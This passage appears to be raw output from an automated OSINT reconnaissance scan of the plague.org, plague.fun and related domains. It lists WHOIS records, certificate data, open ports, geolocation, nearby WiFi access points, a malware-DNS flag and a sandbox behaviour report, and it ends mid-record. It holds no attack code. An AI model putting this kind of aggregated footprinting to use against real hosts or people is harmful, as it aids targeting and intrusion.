Name Server: dns2.stabletransit.com Name Server: dns1.stabletransit.com DNSSEC: unsigned Registrar Abuse Contact Email: domainabuse@tucows.com Registrar Abuse Contact Phone: +1.4165350123 URL of the ICANN WHOIS Data Problem Reporting System: https://icann.org/wicf >>> Last update of WHOIS database: 2022-12-18T00:26:49Z <<< "For more information on Whois status codes, please visit https://icann.org/epp" The Data in the Tucows Registrar WHOIS database is provided to you by Tucows for information purposes only, and may be used to assist you in obtaining information about or related to a domain name's registration record. Tucows makes this information available "as is," and does not guarantee its accuracy. By submitting a WHOIS query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass, unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of any Registry Operator or ICANN-Accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of Tucows. Tucows reserves the right to terminate your access to the Tucows WHOIS database in its sole discretion, including without limitation, for excessive querying of the WHOIS database or for failure to otherwise abide by this policy. Tucows reserves the right to modify these terms at any time. By submitting this query, you agree to abide by these terms. NOTE: THE WHOIS DATABASE IS A CONTACT DATABASE ONLY. LACK OF A DOMAIN RECORD DOES NOT SIGNIFY DOMAIN AVAILABILITY. plague.org 2022-12-18 00:20:59 Open TCP Port No Censys 0 0 2 0 None 2606:4700:3033::6815:1cf0:80 2606:4700:3033::6815:1cf0 2022-12-18 00:12:47 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'NH', u'country_tld': u'.nl', u'ip': u'188.114.96.3', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 17231017, u'country_code': u'NL', u'timezone': u'Europe/Amsterdam', u'city': u'Amsterdam', u'network': u'188.114.96.0/22', u'languages': u'nl-NL,fy-NL', u'version': u'IPv4', u'latitude': 52.3759, u'in_eu': True, u'utc_offset': u'+0100', u'continent_code': u'EU', u'country_name': u'Netherlands', u'country_capital': u'Amsterdam', u'org': u'CLOUDFLARENET', u'postal': u'1012', u'asn': u'AS13335', u'country': u'NL', u'region': u'North Holland', u'longitude': 4.8975, u'country_calling_code': u'+31', u'country_area': 41526.0, u'country_code_iso3': u'NLD'} 188.114.96.3 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None WLAN (Net ID: 00:01:24:F2:6F:6D) 37.7803446,-122.3906132 2022-12-18 00:04:11 SSL Certificate - Issued by No SSL Certificate Analyzer 0 0 2 0 None C=US,O=Cloudflare\, Inc.,CN=Cloudflare Inc ECC CA-3 188.114.97.1 2022-12-18 00:18:35 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.15:8080 188.114.97.0/24 2022-12-18 00:02:43 SSL Certificate - Raw Data No CertSpotter 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 04:43:a4:7d:29:1f:15:0e:6b:ac:86:e4:4b:c0:be:69:71:a9 Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Oct 6 20:16:48 2022 GMT Not After : Jan 4 20:16:47 2023 GMT Subject: CN=hook.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:f0:6d:9d:3e:65:e2:27:e7:f9:e7:b1:43:5d:9b: 9c:71:a3:74:87:8a:60:c8:7f:29:27:0c:3b:70:18: 0e:65:ff:e2:e4:6c:b2:93:6d:33:61:6a:bf:38:4f: 05:cd:5b:2e:49:18:0c:c5:32:5e:a6:f8:13:92:a2: 54:15:20:f1:b8 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 2D:72:09:99:1A:17:4B:10:83:60:E6:EB:30:F2:51:56:F6:45:4B:C4 X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:hook.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : DF:A5:5E:AB:68:82:4F:1F:6C:AD:EE:B8:5F:4E:3E:5A: EA:CD:A2:12:A4:6A:5E:8E:3B:12:C0:20:44:5C:2A:73 Timestamp : Oct 6 21:16:48.471 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:B6:95:B7:C7:1C:80:2B:FD:7A:41:2D: D1:EE:2B:F0:0C:C7:D5:AD:4A:C9:E0:25:F1:61:3A:42: F4:C7:98:23:BC:02:21:00:B0:8C:72:F0:4F:8A:E8:6C: E9:F6:34:39:22:96:3C:C5:FF:9B:84:63:71:CD:62:74: 2D:25:B6:5D:82:07:80:00 Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 6F:53:76:AC:31:F0:31:19:D8:99:00:A4:51:15:FF:77: 15:1C:11:D9:02:C1:00:29:06:8D:B2:08:9A:37:D9:13 Timestamp : Oct 6 21:16:48.762 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:DA:81:A7:33:FB:84:F9:8B:E8:59:67: 5A:B3:BB:7D:23:4E:13:C6:1F:EE:CC:11:CA:90:D9:C7: C2:B8:84:2C:2D:02:21:00:A5:46:C0:7E:74:96:53:9F: 09:9C:0C:0A:E5:A6:43:B1:BB:DE:4F:9A:14:FF:CA:3E: 71:1D:06:51:72:4F:0A:A0 Signature Algorithm: sha256WithRSAEncryption 55:5a:e5:d4:fc:c1:91:97:fc:62:bf:e7:7d:ab:bf:5e:2a:ad: c4:a2:38:e6:93:85:38:b7:1d:d3:de:32:0e:e2:4c:99:4d:11: 27:08:6e:c9:87:6b:86:71:63:52:48:6f:97:81:d6:f9:d3:dc: 30:6a:31:71:f9:50:72:a5:5c:59:fc:73:29:d0:b8:38:7a:27: 41:b3:38:31:80:5b:74:88:40:5c:51:13:29:ba:41:ab:49:a7: e8:e8:a1:04:15:8b:d3:c3:02:3a:31:08:81:2e:a2:e2:41:9c: f5:7c:f1:58:bd:ec:4c:d9:0f:e7:c3:72:72:de:1f:50:66:17: 23:e5:df:b5:36:49:5e:e1:af:17:75:d9:18:54:94:ad:e0:ae: 38:ac:2c:09:c5:01:1b:8f:32:6d:7c:38:3e:2d:4f:0d:f7:64: fd:89:7a:f0:42:66:14:a5:26:b2:2b:cf:14:ba:10:2f:cc:af: d0:b7:ba:7a:29:73:d4:f3:c1:81:fe:b4:29:3b:c6:4b:56:c8: 19:d2:3a:d5:73:1c:13:73:cf:59:a2:f3:e1:26:e5:8e:fe:04: 40:3b:31:4f:84:d4:d1:f1:ca:a5:a1:c2:9f:31:f4:54:e2:fe: 50:4a:40:71:15:f7:ff:77:5d:a2:45:82:9e:19:be:52:a9:21: 85:4e:41:e2 plague.fun 2022-12-18 00:21:09 Open TCP Port No Censys 0 0 2 0 None 188.114.96.0:2096 188.114.96.0 2022-12-18 00:21:20 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["77aaa4331c29fd8a-ORD"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": [""]} 188.114.97.1 2022-12-18 00:16:56 Malicious Internet Name Yes CloudFlare Malware DNS 0 1 2 0 None Blocked by CloudFlare DNS [webmail.zerotwo-best-waifu.online] webmail.zerotwo-best-waifu.online 2022-12-18 00:17:00 HTTP Status Code No Web Spider 0 0 4 0 None 200 http://webmail.zerotwo-best-waifu.online/js/vendor/bootstrap.min.js 2022-12-18 00:12:06 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'ON', u'country_tld': u'.ca', u'ip': u'104.21.28.240', u'currency_name': u'Dollar', u'currency': u'CAD', u'country_population': 37058856, u'country_code': u'CA', u'timezone': u'America/Toronto', u'city': u'Toronto', u'network': u'104.21.0.0/19', u'languages': u'en-CA,fr-CA,iu', u'version': u'IPv4', u'latitude': 43.6227, u'in_eu': False, u'utc_offset': u'-0500', u'continent_code': u'NA', u'country_name': u'Canada', u'country_capital': u'Ottawa', u'org': u'CLOUDFLARENET', u'postal': u'M5J', u'asn': u'AS13335', u'country': u'CA', u'region': u'Ontario', u'longitude': -79.3892, u'country_calling_code': u'+1', u'country_area': 9984670.0, u'country_code_iso3': u'CAN'} 104.21.28.240 2022-12-18 00:05:49 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 16, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://themozigames.repl.co/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"themozigames.repl.co"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:443"\n "142.250.189.202:443"\n "142.250.191.67:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "Part-RU" as clean (type is "DOS executable (COM)")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:2268:120:WilError_01"\n "Local\\SM0:2312:304:WilStaging_02"\n "Local\\SM0:2312:120:WilError_01"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:2268:304:WilStaging_02"\n "Local\\SM0:2268:120:WilError_01"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:2268:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6720:304:WilStaging_02"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-33', u'name': u'Drops executable files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%TEMP%\\2268_478418729\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00002268]\n "Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\2268_1205038581\\Part-RU]- [targetUID: 00000000-00002268]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%TEMP%\\2268_478418729\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00002268]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Service Worker\\Database\\000003.log]- [targetUID: 00000000-00002268]\n "Part-NL" has type "PGP symmetric key encrypted data -"- Location: [%TEMP%\\2268_1205038581\\Part-NL]- [targetUID: 00000000-00002268]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2268_1812474118\\product_page.js]- [targetUID: 00000000-00002268]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00002268]\n "548de883-9607-4926-9804-27e29264f951.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\548de883-9607-4926-9804-27e29264f951.tmp]- [targetUID: 00000000-00007596]\n "f_00023e" has type "PNG image data 1761 x 991 8-bit/color RGB non-interlaced"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023e]- [targetUID: 00000000-00007596]\n "Session_13314706105756620" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sessions\\Session_13314706105756620]- [targetUID: 00000000-00002268]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002268]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.33\\Ruleset Data]- [targetUID: 00000000-00002268]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Kids Mode\\0.0.0.10\\manifest.fingerprint]- [targetUID: 00000000-00002268]\n "f_00023d" has type "PNG image data 1761 x 991 8-bit/color RGB non-interlaced"- [targetUID: N/A]\n "Part-ES" has type "data"- Location: [%TEMP%\\2268_1205038581\\Part-ES]- [targetUID: 00000000-00002268]\n "7d1d317b-474f-454f-9a8f-99191e2e1ce8.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\7d1d317b-474f-454f-9a8f-99191e2e1ce8.tmp]- [targetUID: 00000000-00002268]\n "LICENSE" has type "ASCII text with CRLF line terminators"- Location: [%TEMP%\\2268_1205038581\\LICENSE]- [targetUID: 00000000-00002268]\n "Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\2268_1205038581\\Part-RU]- [targetUID: 00000000-00002268]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00002268]\n "e93703ec-1b1f-4cd8-ac7e-72ecaace237e.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\e93703ec-1b1f-4cd8-ac7e-72ecaace237e.tmp]- [targetUID: 00000000-00002268]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00002268]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2268_1812474118\\auto_open_controller.js]- [targetUID: 00000000-00002268]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://themozigames.repl.co/"\n Pattern match: "https://themozigames.repl.co"\n Heuristic match: "themozigames.repl.co"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/90 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 8, u'description': u'Dropped file: "product_page.js" - Location: [%TEMP%\\2268_1812474118\\product_page.js]- [targetUID: 00000000-00002268]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\2268_1812474118\\auto_open_controller.js]- [targetUID: 00000000-00002268]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\2268_1812474118\\edge_checkout_page_validator.js]- [targetUID: 00000000-00002268]\n Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\2268_1812474118\\edge_tracking_page_validator.js]- [targetUID: 00000000-00002268]\n Dropped file: "shopping.js" - Location: [%TEMP%\\2268_1812474118\\shopping.js]- [targetUID: 00000000-00002268]\n Dropped file: "edge_driver.js" - Location: [%TEMP%\\2268_1812474118\\edge_driver.js]- [targetUID: 00000000-00002268]\n Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\2268_1812474118\\shopping_iframe_driver.js]- [targetUID: 00000000-00002268]\n Dropped file: "edge_confirmation_page_validator.js" - Location: [%TEMP%\\2268_1812474118\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00002268]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\2268_1205038581\\adblock_snippet.js]- [targetUID: 00000000-00002268]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\2268_1812474118\\shoppingfre.js]- [targetUID: 00000000-00002268]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-1', u'name': u'Drops executable files', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%TEMP%\\2268_478418729\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00002268]\n "Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\2268_1205038581\\Part-RU]- [targetUID: 00000000-00002268]'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-43', u'name': u'Writes a PE file header to disc', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 6, u'description': u'"msedge.exe" wrote 8192 bytes starting with PE header signature to file "%TEMP%\\2268_478418729\\_platform_specific\\win_x64\\widevinecdm.dll": 4d5a78000100000004000000000000000 34.149.204.188 2022-12-18 00:31:52 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None westabuse@gmail.com Domain Name: PLAGUE.ONLINE Registry Domain ID: D209164753-CNIC Registrar WHOIS Server: whois.west.cn Registrar URL: http://www.west.cn Updated Date: 2022-12-16T12:58:58.0Z Creation Date: 2020-11-15T10:10:12.0Z Registry Expiry Date: 2023-11-15T23:59:59.0Z Registrar: CHENGDU WEST DIMENSION DIGITAL TECHNOLOGY CO., LTD. Registrar IANA ID: 1556 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registrant Organization: Wei Cao Registrant State/Province: Jiang Su Registrant Country: CN Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: NS4.MYHOSTADMIN.NET Name Server: NS5.MYHOSTADMIN.NET Name Server: NS1.MYHOSTADMIN.NET Name Server: NS2.MYHOSTADMIN.NET Name Server: NS3.MYHOSTADMIN.NET DNSSEC: unsigned Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registrar Abuse Contact Email: abuse@west.cn Registrar Abuse Contact Phone: +86.2862778877 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:31:46.0Z <<< For more information on Whois status codes, please visit https://icann.org/epp >>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnic.com/support/rdap <<< The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com) Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnic.com/pub/whois_guidance. Domain Name: plague.online Registry Domain ID: zdns-xyz52160522 Registrar WHOIS Server: whois.west.cn Registrar URL: www.west.cn Updated Date: 2020-11-15T10:10:12.0Z Creation Date: 2020-11-15T10:10:12.0Z Registrar Registration Expiration Date: 2023-11-15T23:59:59.0Z Registrar: Chengdu west dimension digital technology Co., LTD Registrar IANA ID: 1556 Reseller: Domain Status: ok http://www.icann.org/epp#ok Registry Registrant ID: Not Available From Registry Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Jiang Su Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: CN Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: Registrant Email: link at https://www.west.cn/web/whoisform?domain=plague.online Registry Admin ID: Not Available From Registry Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: Admin Email: link at https://www.west.cn/web/whoisform?domain=plague.online Registry Tech ID: Not Available From Registry Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: Tech Email: link at https://www.west.cn/web/whoisform?domain=plague.online Name Server: ns1.myhostadmin.net Name Server: ns2.myhostadmin.net DNSSEC: signedDelegation Registrar Abuse Contact Email: westabuse@gmail.com Registrar Abuse Contact Phone: +86.2862778877 URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:31:48.0Z <<< For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None SpaceStation (Net ID: 00:02:2D:01:CF:F8) 37.780462,-122.390564 2022-12-18 00:09:14 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.2:443 188.114.96.0/24 2022-12-18 00:09:45 Open TCP Port No LeakIX 0 0 2 0 None 188.114.96.9:443 188.114.96.9 2022-12-18 00:37:18 Similar Domain - Whois No Whois 1 0 2 0 None Domain Name: PRGMR.COM Registry Domain ID: 70002607_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.joker.com Registrar URL: http://www.joker.com Updated Date: 2022-05-22T20:37:35Z Creation Date: 2001-04-26T22:09:32Z Registry Expiry Date: 2023-04-26T22:09:32Z Registrar: CSL Computer Service Langenbach GmbH d/b/a joker.com Registrar IANA ID: 113 Registrar Abuse Contact Email: abuse@joker.com Registrar Abuse Contact Phone: +49.21186767447 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Name Server: NS.PRGMR.COM Name Server: NS2.PRGMR.COM Name Server: NS3.PRGMR.COM DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2022-12-18T00:37:12Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy. By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. Domain Name: prgmr.com Registry Domain ID: 70002607_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.joker.com Registrar URL: https://joker.com Updated Date: 2022-05-22T20:37:35Z Creation Date: 2001-04-27T00:09:53Z Registrar Registration Expiration Date: 2023-04-26T22:09:32Z Registrar: CSL Computer Service Langenbach GmbH d/b/a joker.com Registrar IANA ID: 113 Registrar Abuse Contact Email: abuse@joker.com Registrar Abuse Contact Phone: +49.21186767447 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registrant Organization: Prgmr.com, Inc Registrant State/Province: ca Registrant Country: US Registrant Email: https://csl-registrar.com/contact/prgmr.com/owner Admin Email: https://csl-registrar.com/contact/prgmr.com/admin Tech Email: https://csl-registrar.com/contact/prgmr.com/tech Name Server: ns.prgmr.com Name Server: ns2.prgmr.com Name Server: ns3.prgmr.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:37:18Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTE: By submitting a WHOIS query, you agree to abide by the following NOTE: terms of use: You agree that you may use this data only for lawful NOTE: purposes and that under no circumstances will you use this data to: NOTE: (1) allow, enable, or otherwise support the transmission of mass NOTE: unsolicited, commercial advertising or solicitations via direct mail, NOTE: e-mail, telephone, or facsimile; or (2) enable high volume, automated, NOTE: electronic processes that apply to Joker.com (or its computer systems). NOTE: The compilation, repackaging, dissemination or other use of this data NOTE: is expressly prohibited without the prior written consent of Joker.com. plague.xen.prgmr.com 2022-12-18 00:10:04 Web Server No URLScan.io 0 0 1 0 None Werkzeug/2.2.2 Python/3.9.11 misogyny.wtf 2022-12-18 00:21:34 Open TCP Port No Censys 0 0 2 0 None 104.21.19.243:2052 104.21.19.243 2022-12-18 00:21:09 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77a965aafc2c2b03-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 188.114.96.0 2022-12-18 00:20:59 BGP AS Membership No Censys 0 0 2 0 None 13335 2606:4700:3033::6815:1cf0 2022-12-18 00:09:10 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.0:8443 188.114.96.0/24 2022-12-18 00:27:16 Physical Location No MetaDefender 0 0 2 0 None Medellin, Colombia 188.114.96.3 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None 2cdc0387-f453-4585-abc6-b131de9f7b91.id.repl.co 34.149.204.188 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None dvdbeyond (Net ID: 00:01:24:F2:B3:12) 37.780462,-122.390564 2022-12-18 00:19:06 Physical Location No ipstack 0 